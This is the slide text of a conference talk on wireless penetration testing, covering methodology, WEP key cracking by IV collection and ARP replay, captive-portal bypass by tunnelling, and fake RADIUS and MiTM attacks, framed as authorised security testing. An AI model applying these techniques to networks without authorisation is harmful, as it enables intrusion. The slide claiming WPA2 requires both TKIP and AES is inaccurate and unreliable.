Strategic Security, Inc. © http://www.strategicsec.com/
Wireless Penetration Testing is More Than
Cracking WEP
Presented By: Joe McCray
Strategic Security, Inc. © http://www.strategicsec.com/
Hmmm......Interesting
Strategic Security, Inc. © http://www.strategicsec.com/
Anybody Hungry???
Strategic Security, Inc. © http://www.strategicsec.com/
Don’t Worry About Turning Off Your Phones For This
Presentation. I’ll Take Care Of That For You.
Strategic Security, Inc. © http://www.strategicsec.com/
Now What Day Did You Say You Checked In?
Strategic Security, Inc. © http://www.strategicsec.com/
What If I Want Percocet More Than Every 4
Hours?
Strategic Security, Inc. © http://www.strategicsec.com/
I Want To Join The Group Too: The Domain Admin Group.
Strategic Security, Inc. © http://www.strategicsec.com/
How Did You Do All Of This?
Strategic Security, Inc. © http://www.strategicsec.com/
How Did You Do All Of This?
Strategic Security, Inc. © http://www.strategicsec.com/
1. Scope of Wireless Penetration Testing
2. Methodology
3. Tools of the trade
4. Peeling The Onion of a Wireless Network
5. It's all about the data
Agenda
Strategic Security, Inc. © http://www.strategicsec.com/
1. Reconnaissance Phase
2. Attack (Penetration Testing) Phase
3. Range Survey Phase
4. Reporting
Methodology
Strategic Security, Inc. © http://www.strategicsec.com/
1.Initial Observations
Conducted on foot or in a car, using a handheld device or laptop to gather signal
strength and a listing of available wireless networks
2.Analysis of available networks
Silently gather information about WAPs and clients using each WAP.
- Determine if network is in scope for the assessment
3.Gather Network and AP Information
Gather details for all networks under test.
- Use packet captures to record traffic passing over the network.
Reconnaissance Phase
Strategic Security, Inc. © http://www.strategicsec.com/
1.Use data gathered within the recon phase to enumerate priority list of targets.
2.Survey & sniff open access points (if available).
3.Break WEP/WPA encryption if available.
4.Prepare fake RADIUS Server for WPA / managed APs.
5.Launch MiTM attacks.
6.Use other attack patterns as appropriate.
Attack Penetration Testing Phase
Strategic Security, Inc. © http://www.strategicsec.com/
1.Survey with typical wireless card, omni-directional antenna, and GPS.
2.Survey with typical wireless card, directional antenna, and GPS.
3.Generate signal maps using gathered data and mapping utility.
Range Survey Phase
Strategic Security, Inc. © http://www.strategicsec.com/
Customers tend to implement the following:
1. Configuration parameter ambiguity
2. 802.11 Wireless Authentication
3. 802.11 Wireless Encryption
4. Wireless Network Isolation
5. Wireless Client Isolation
....Just remember that we're on offense? We're pentesters.
Peeling Back The Layers
Strategic Security, Inc. © http://www.strategicsec.com/
Configuration Parameter Ambiguity
- SSID Broadcast Disabled
- MAC Address Filtering
Configuration Ambiguity
Strategic Security, Inc. © http://www.strategicsec.com/
Wireless Authentication
WEP -- Poorest
Cisco's LEAP -- Poor
WPA-PSK -- Better
WPA-Enterprise -- Best
Wireless Authentication
Strategic Security, Inc. © http://www.strategicsec.com/
Wireless Encryption
WEP -- Poorest
WPA (TKIP) -- Better
WPA2 (AES) -- Best
Wireless Encryption
Strategic Security, Inc. © http://www.strategicsec.com/
Wireless Network Isolation
Zero Separation -- Poorest
Layer 3 Routed Boundary -- Poor
Firewalled Boundary -- Better
VPN Concentrator -- Best
Wireless Separation
Strategic Security, Inc. © http://www.strategicsec.com/
Zero Separation is all too common.
Countless times I see wireless networks that are basically bridged to the LAN.
There is no work required for me to get to the LAN.
Wireless Network Isolation
Strategic Security, Inc. © http://www.strategicsec.com/
Layer 3 Routed Boundry is almost as common.
Your best shot here is using EXTREMELY specific ACLs, and to be honest that
doesn't help much either.
Wireless Network Isolation
Strategic Security, Inc. © http://www.strategicsec.com/
Used commonly in Hotels, Airports, Coffee Shops, etc…
2 Primary bypass methods
- Impersonating an Authorized Wireless Client
- Tunneling Traffic out of the network via DNS, or ICMP
Captive Portal
Strategic Security, Inc. © http://www.strategicsec.com/
Firewalled Boundry is much less common.
In my opinion the only thing you really get with this over the routed boundry is
better logging.
Wireless Network Isolation
Strategic Security, Inc. © http://www.strategicsec.com/
VPN Concentrator is even less common, but it's probably your best option if you find
that packet overhead isn't affecting business operations.
This can really slow down your network.
Wireless Network Isolation
Strategic Security, Inc. © http://www.strategicsec.com/
Let's start with the simple stuff....
Simple security mechanisms suck
- SSID Broadcast disabled
- MAC Address Filtering
Wireless Traffic That Reveals Confidential Information
Rouge Access Points
- Employees deploying rogue APs
- Malicious attackers deploying rogue APs
OK – I’m Bored – Let’s Do Some Hacking
Strategic Security, Inc. © http://www.strategicsec.com/
WEP was the first encryption standard available for wireless networks. WEP
can be deployed in two strengths, 64 bit and 128 bit. 64-bit WEP consists of a 40-
bit secret key and a 24-bit initialization vector, and is often referred to as 40-bit
WEP. 128-bit WEP similarly employs a 104-bit secret key and a 24-bit initialization
vector and is often called 104-bit WEP.
Association with WEP encrypted networks can be accomplished through the use of
a password, an ASCII key, or a hexadecimal key. WEP’s implementation of the
RC4 algorithm was determined to be flawed, allowing an attacker to crack the key
and compromise WEP encrypted networks.
Attacking Wireless Authentication &
Encryption Mechanisms
Strategic Security, Inc. © http://www.strategicsec.com/
- WEP has been dead since 2001
- 2 Primary Methods of attacking WEP
- Collection of weak IVs
After somewhere between 1,500 and 5,000 "weak" IVs are collected,
they can be fed back into the Key Scheduling Algorithm (KSA) and
Pseudo Random Number Generator (PRNG) and the first byte of the key
is revealed. This process is then repeatedfor each byte until the WEP key
is cracked
- Collection of unique IVs
The last byte from the WEP packet is removed, effectively breaking the
Cyclic Redundancy Check/Integrity Check Value (CRC/ICV). If the last
byte was zero, then xor a certain value with the last four bytes of the
packet and the CRC will become valid again. This packet can then be
retransmitted.
WEP IS DEAD!!!!!!!
Strategic Security, Inc. © http://www.strategicsec.com/
WEP is dead continued...
The biggest problem with attacks against WEP is that collecting enough
packets. Traffic can be injected into the network, creating more packets.
This is usually accomplished by collecting one or more Address Resolution
Protocol (ARP) packets and retransmitting them to the access point.
ARP packets are a good choice because they have a predictable size (28
bytes).The response will generate traffic and increase the speed that
packets are collected.
WEP IS DEAD!!!!!!!
Strategic Security, Inc. © http://www.strategicsec.com/
WPA was developed to replace WEP because of the vulnerabilities associated with it.
WPA can be deployed either using a pre-shared key (WPA-PSK) or in conjunction
with a RADIUS server (WPA-RADIUS). WPA uses either the Temporal Key Integrity
Protocol (TKIP) or the Advanced Encryption Standard (AES) for its encryption
algorithm.
Some vulnerabilities were discovered with certain implementations of WPA-PSK.
Because of this, and to further strengthen the encryption, WPA2 was developed.
The primary difference between WPA and WPA2 is that WPA2 requires the use of
both TKIP and AES, where WPA allowed the user to determine which would be
employed.
What About WPA??
Strategic Security, Inc. © http://www.strategicsec.com/
WPA/WPA2 requires the use of an authentication piece in addition to the encryption
piece. A form of the Extensible Authentication Protocol (EAP) is used for this piece.
There are five different EAPs available for use with WPA/WPA2:
- EAP-TLS
- EAP-TTLS/MSCHAPv2
- EAPv0/EAP-MSCHAP2
- EAPv1/EAP-GTC
- EAP-SIM
WPA Continued...
Strategic Security, Inc. © http://www.strategicsec.com/
At the end of the day wireless penetration testing is really about verifying
whether or not an attacker can gain access to your production network.
At its core it’s no different than physical security testing. Can you get to the
production network?
At The End Of The Day....It’s All About The Data
Strategic Security, Inc. © http://www.strategicsec.com/
If you have other questions you’d like to ask outside of this conference,
or if you want to get a copy of my slides you can contact me at:
Email: [email protected]
Twitter: @j0emccray
LinkedIn: http://www.linkedin.com/in/joemccray
Download This Presentation
Top Related